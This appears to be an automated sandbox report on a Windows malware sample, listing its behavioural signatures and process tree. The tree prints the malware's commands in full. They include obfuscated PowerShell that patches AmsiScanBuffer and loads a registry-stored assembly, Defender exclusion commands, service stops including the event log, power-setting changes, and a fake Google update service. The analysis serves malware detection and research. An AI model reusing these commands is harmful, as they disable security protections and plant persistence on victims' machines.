Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 12:51

General

  • Target

    e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe

  • Size

    15.9MB

  • MD5

    d3c16cede9b6e4ee304a0184328d313d

  • SHA1

    bd82838a3cc343956ecce4d5051b510dd941de11

  • SHA256

    e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c

  • SHA512

    284c38ba1a8ce4120120eb89a8e17bcbb6c3d18874c189d65812e767a111883813163ab614d5de802b5ee2fe774143a84017399508c24ac061029828d3046f6b

  • SSDEEP

    393216:fwibRRlK6/C+1ZDpHKG1cVWNEtW5I+L11k2OEin:f7RllK+LlaaSW5zL1ypEin

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1016
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{913f847a-2d76-4bd4-b1b3-e10e37e46ad9}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1992
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{54e8d8b2-ad3d-4609-9162-faf425077286}
          2⤵
            PID:5040
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:672
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:936
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:436
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:696
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1080
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1104
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1120
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1152
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:392
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qGizraFaxxBX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oIvBKAthIcoQJj,[Parameter(Position=1)][Type]$MVRoQnyvSu)$rcDKxFFcljc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+'d'+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'ss'+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](83)+''+'e'+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+'u'+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rcDKxFFcljc.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$oIvBKAthIcoQJj).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+'g'+''+[Char](101)+'d');$rcDKxFFcljc.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+'ke',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+'id'+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'ual',$MVRoQnyvSu,$oIvBKAthIcoQJj).SetImplementationFlags('Run'+[Char](116)+'ime'+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $rcDKxFFcljc.CreateType();}$oAqcVToeAKEDm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2.'+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+'fe'+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'et'+'h'+''+[Char](111)+'d'+[Char](115)+'');$FNsKXqLRjKGcfu=$oAqcVToeAKEDm.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Pr'+[Char](111)+'c'+'A'+''+'d'+''+'d'+''+'r'+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+[Char](116)+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FsmOXxUkagmJAWikCmN=qGizraFaxxBX @([String])([IntPtr]);$sjLUEoUSFIROFOCOazxlBb=qGizraFaxxBX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$irqdsawgzBS=$oAqcVToeAKEDm.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$qYkFwkfkpmVHcm=$FNsKXqLRjKGcfu.Invoke($Null,@([Object]$irqdsawgzBS,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+'a'+''+[Char](114)+'y'+'A'+'')));$xaHnaRyZGqWTObbjF=$FNsKXqLRjKGcfu.Invoke($Null,@([Object]$irqdsawgzBS,[Object]('V'+'i'+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+'ot'+[Char](101)+'c'+[Char](116)+'')));$LWCxpma=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qYkFwkfkpmVHcm,$FsmOXxUkagmJAWikCmN).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+[Char](108)+'l');$phcVUgvURUikJPSDY=$FNsKXqLRjKGcfu.Invoke($Null,@([Object]$LWCxpma,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+'ffer')));$BZQjrCUOYI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xaHnaRyZGqWTObbjF,$sjLUEoUSFIROFOCOazxlBb).Invoke($phcVUgvURUikJPSDY,[uint32]8,4,[ref]$BZQjrCUOYI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$phcVUgvURUikJPSDY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xaHnaRyZGqWTObbjF,$sjLUEoUSFIROFOCOazxlBb).Invoke($phcVUgvURUikJPSDY,[uint32]8,0x20,[ref]$BZQjrCUOYI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('di'+'a'+'l'+[Char](101)+''+'r'+''+[Char](115)+''+'t'+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2152
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MNFEVnPHfDch{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rZtWgGeURlraAF,[Parameter(Position=1)][Type]$PEmFeQyZBp)$nknVGtpJuEd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+',Se'+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+','+[Char](65)+'ut'+'o'+'C'+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$nknVGtpJuEd.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+'me,'+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+''+'u'+'b'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rZtWgGeURlraAF).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'an'+'a'+'g'+'e'+''+[Char](100)+'');$nknVGtpJuEd.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$PEmFeQyZBp,$rZtWgGeURlraAF).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $nknVGtpJuEd.CreateType();}$yLfwPJgtHnVmj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'ll')}).GetType('Micr'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+'f'+'e'+[Char](78)+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'tho'+'d'+''+[Char](115)+'');$ucShtxiyvcZRmj=$yLfwPJgtHnVmj.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dtXWFdtBTqqYHhsSEGn=MNFEVnPHfDch @([String])([IntPtr]);$vBBGxJFjUsJExitDRkyLKd=MNFEVnPHfDch @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LjixHFhwGBc=$yLfwPJgtHnVmj.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LQrdGGEkpoOrId=$ucShtxiyvcZRmj.Invoke($Null,@([Object]$LjixHFhwGBc,[Object](''+'L'+''+'o'+''+'a'+''+'d'+''+'L'+'i'+'b'+'r'+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$LQIlcwIGzGFsrKKZv=$ucShtxiyvcZRmj.Invoke($Null,@([Object]$LjixHFhwGBc,[Object](''+'V'+''+'i'+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+'o'+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$mBChEvl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LQrdGGEkpoOrId,$dtXWFdtBTqqYHhsSEGn).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$SqlZJkpkrLLbMpkyn=$ucShtxiyvcZRmj.Invoke($Null,@([Object]$mBChEvl,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+'r'+'')));$nUlhbvCuMg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LQIlcwIGzGFsrKKZv,$vBBGxJFjUsJExitDRkyLKd).Invoke($SqlZJkpkrLLbMpkyn,[uint32]8,4,[ref]$nUlhbvCuMg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SqlZJkpkrLLbMpkyn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LQIlcwIGzGFsrKKZv,$vBBGxJFjUsJExitDRkyLKd).Invoke($SqlZJkpkrLLbMpkyn,[uint32]8,0x20,[ref]$nUlhbvCuMg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OFT'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1724
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:5064
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1268
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1292
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1340
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1376
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1436
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2964
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1568
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1584
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1624
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1704
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1736
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1760
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1824
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1876
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1888
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2004
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:884
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2056
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2176
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2212
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2224
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2348
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2360
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2488
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2568
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2600
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2608
                                                                            • C:\Windows\sysmon.exe
                                                                              C:\Windows\sysmon.exe
                                                                              1⤵
                                                                                PID:2628
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2956
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:2988
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3176
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3364
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3456
                                                                                          • C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe"
                                                                                            2⤵
                                                                                            • Drops file in Drivers directory
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4612
                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3344
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                              3⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3044
                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                4⤵
                                                                                                  PID:4884
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4796
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4032
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1132
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4944
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1184
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                3⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4936
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                3⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4824
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                3⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4052
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                3⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1840
                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                C:\Windows\system32\dialer.exe
                                                                                                3⤵
                                                                                                  PID:3860
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:3372
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:2748
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe stop eventlog
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:2896
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:4428
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    4⤵
                                                                                                      PID:2340
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                1⤵
                                                                                                  PID:3572
                                                                                                • C:\Windows\system32\DllHost.exe
